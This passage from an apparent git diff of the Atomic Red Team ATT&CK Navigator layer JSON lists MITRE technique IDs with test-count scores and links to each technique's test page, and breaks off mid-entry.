Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":44,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1056","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":60,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":57,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":74,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View 